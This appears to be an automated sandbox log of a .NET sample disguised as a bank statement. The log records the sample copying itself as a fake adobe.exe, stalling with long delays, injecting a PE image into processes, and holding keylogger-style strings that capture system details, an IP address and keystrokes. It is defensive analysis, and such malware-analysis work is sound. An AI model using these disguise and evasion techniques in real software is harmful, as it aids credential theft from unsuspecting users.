Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598952	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598842	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598624	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598296	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598075	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597749	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597640	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597309	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597202	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596983	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596874	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596201	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595862	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595749	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595634	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595530	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595421	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595202	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594874	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 593999	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 593852	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599124	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598139	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597801	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597555	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597445	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597336	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597199	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596437	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596218	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595671	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595562	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595343	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595119	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594858	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594727	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594591	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594436	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594322	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 593984	Jump to behavior

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4104320850.0000000001404000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: adobe.exe, 00000007.00000002.1888089380.000000000138D000.00000004.00000020.00020000.00000000.sdmp, adobe.exe, 0000000A.00000002.4104072984.000000000143F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, ProcessorArchitecture.cs	Reference to suspicious API methods: Microsoft.Build.Shared.NativeMethods.LoadLibrary("kernel32.dll")
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, ProcessorArchitecture.cs	Reference to suspicious API methods: Microsoft.Build.Shared.NativeMethods.GetProcAddress(intPtr, "IsWow64Process")
Source: 0.2.Statement JULY #U007e SEP 2024 USD 19,055.00.exe.3941c80.0.raw.unpack, WzE.cs	Reference to suspicious API methods: GXmc.OpenProcess(jHxuhfTis5.DuplicateHandle, bInheritHandle: true, (uint)bTRx6NbOE.ProcessID)

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Memory written: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Memory written: C:\Users\user\AppData\Roaming\Adobe\adobe.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process created: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe "C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process created: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe "C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Process created: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe "C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Process created: C:\Users\user\AppData\Roaming\Adobe\adobe.exe "C:\Users\user\AppData\Roaming\adobe\adobe.exe"	Jump to behavior

Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000003032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q9<b>[ Program Manager]</b> (30/10/2024 05:48:01)<br>{Win}rTHcqX
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000003032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000003032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q8<b>[ Program Manager]</b> (30/10/2024 05:48:01)<br>{Win}THcqX
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000003032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^q
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000003032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q><b>[ Program Manager]</b> (30/10/2024 05:48:01)<br>{Win}r{Win}THcqX
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000003032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q3<b>[ Program Manager]</b> (30/10/2024 05:48:01)<br>
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000003046000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: <html>Time: 11/12/2024 22:03:39<br>User Name: user<br>Computer Name: 675052<br>OSFullName: Microsoft Windows 10 Pro<br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: 173.254.250.78<br><hr><b>[ Program Manager]</b> (30/10/2024 05:48:01)<br>{Win}r{Win}r</html>
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000003032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program ManagerLR^qT
Source: Statement JULY #U007e SEP 2024 USD 19,055.00.exe, 00000003.00000002.4106544369.0000000003032000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q?<b>[ Program Manager]</b> (30/10/2024 05:48:01)<br>{Win}r{Win}rTHcqX

Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Users\user\AppData\Roaming\Adobe\adobe.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
